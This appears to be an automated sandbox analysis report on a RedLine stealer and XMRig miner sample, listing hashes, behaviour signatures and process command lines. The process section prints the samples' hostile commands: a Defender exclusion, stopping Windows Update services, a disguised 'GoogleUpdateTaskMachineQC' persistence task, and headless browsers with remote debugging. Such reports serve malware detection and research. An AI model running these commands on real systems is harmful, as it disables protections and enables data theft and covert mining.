| SHA512 | fad982bcda7f763eb4e01da2924c038f359537e1aafee6e517942ab5b5bea2665aee1a81b25b4163d50c43c0a08b11a69446ccf5b4760c506394ee494e990d20 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\data_1
| MD5 | ef0c0ccef491d0f28be10aee8d498796 |
| SHA1 | 8882451b8c716b6a8a8744c5d9c4055d1624685e |
| SHA256 | 92502c0aa9ead0df15a105541800178063d2ae7412d6b1afb3af82c7b4030026 |
| SHA512 | 73f5325094a61901b200ad19a872d8b690c90f8e4a7f604ac1dea034e1625e218ea6595885d976ff98b39ab9127ddb01545f69f6d6c0b00e04b94060090606b1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\Cache\Cache_Data\data_0
| MD5 | 58d10f941444fb5a3d9a4b6d646b7b1d |
| SHA1 | 974861942c807a7adeba558c347f8979b5cd8f22 |
| SHA256 | e1f60dd5512165f155104b5f3dcf7c232623c921e5825bc88b6dbbffa4488952 |
| SHA512 | 3c25825680f21afbdf4e7c2e4b1be7e79849aca4c34e1bbf07cdd17e07026795ef777832d0877183a0cf13223bae156b14d7ee9fb44122337bcebb1a77afbdab |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Default\chrome_debug.log
| MD5 | 7b1337c76ab33b915303603b6982e9b8 |
| SHA1 | 49935a0acc647a72ebc71407ca3a72ab96288bcf |
| SHA256 | 2e9402ab1cc51e7097ced94c5c33d6956cf4d10a07ad48ebbf2d492b52ab4361 |
| SHA512 | 3513482f3fb78be928fd01dab45b909025d2a8484d4ca24c4f86bef7a3163f09afc0a316b3ff5446143f38b2793bb33273a4b41495f0e4f050ba9b5d57db957f |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Crashpad\settings.dat
| MD5 | e97464a8a734e95498a104ffa66eaac3 |
| SHA1 | 1af7be0237e74bc33ba40ab0e1a00aebbf76ff91 |
| SHA256 | f3d8d3715bd397224ca6144eb4d7e832193c0eca5c7c9a5d1302deeccae91a15 |
| SHA512 | e616c7415e711843ddc5caefdcea3f1e57de6ec6efe859dd536ca217f1288d8f826bcfedb911b67c4ee7c9b37963d42186fa635ea2c1daf642f4bfe5de2daf32 |
memory/1668-749-0x0000000074420000-0x0000000074B0E000-memory.dmp
memory/1668-748-0x0000000000B10000-0x0000000001144000-memory.dmp
memory/2996-750-0x00000000199E0000-0x0000000019CC2000-memory.dmp
memory/2996-751-0x0000000000AA0000-0x0000000000AA8000-memory.dmp
memory/2996-752-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp
memory/2996-756-0x0000000001180000-0x0000000001200000-memory.dmp
memory/2996-755-0x0000000001180000-0x0000000001200000-memory.dmp
memory/2996-754-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp
memory/2996-753-0x0000000001180000-0x0000000001200000-memory.dmp
memory/2996-758-0x0000000001180000-0x0000000001200000-memory.dmp
memory/2996-759-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-08-12 08:45
Reported
2023-08-12 08:47
Platform
win10v2004-20230703-en
Max time kernel
146s
Max time network
151s
Command Line
Signatures
RedLine
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3328 created 3188 | N/A | C:\Windows\Temp\setup.exe | C:\Windows\Explorer.EXE |
| PID 3328 created 3188 | N/A | C:\Windows\Temp\setup.exe | C:\Windows\Explorer.EXE |
| PID 3328 created 3188 | N/A | C:\Windows\Temp\setup.exe | C:\Windows\Explorer.EXE |
| PID 3328 created 3188 | N/A | C:\Windows\Temp\setup.exe | C:\Windows\Explorer.EXE |
| PID 3328 created 3188 | N/A | C:\Windows\Temp\setup.exe | C:\Windows\Explorer.EXE |
| PID 3864 created 3188 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 3864 created 3188 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 3864 created 3188 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 3864 created 3188 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 3864 created 3188 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 3864 created 3188 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Windows\Temp\setup.exe | N/A |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Program Files\Google\Chrome\updater.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cli.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cc.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\updater.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cc.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\updater.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3864 set thread context of 4624 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\conhost.exe |
| PID 3864 set thread context of 4180 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\explorer.exe |
| PID 2068 set thread context of 2920 | N/A | C:\Users\Admin\AppData\Local\Temp\cli.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Temp\setup.exe | N/A |
| File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Google\Chrome\updater.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\cli.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe
"C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe"
C:\Users\Admin\AppData\Local\Temp\mi.exe
"C:\Users\Admin\AppData\Local\Temp\mi.exe"
C:\Users\Admin\AppData\Local\Temp\cli.exe
"C:\Users\Admin\AppData\Local\Temp\cli.exe"
C:\Users\Admin\AppData\Local\Temp\cc.exe
"C:\Users\Admin\AppData\Local\Temp\cc.exe"
C:\Windows\Temp\setup.exe
"C:\Windows\Temp\setup.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=31791 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU" --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc00439758,0x7ffc00439768,0x7ffc00439778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1368 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1688 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=31791 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1984 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=31791 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2336 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=31791 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2516 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=31791 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3096 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=31791 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3236 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=31871 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP" --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
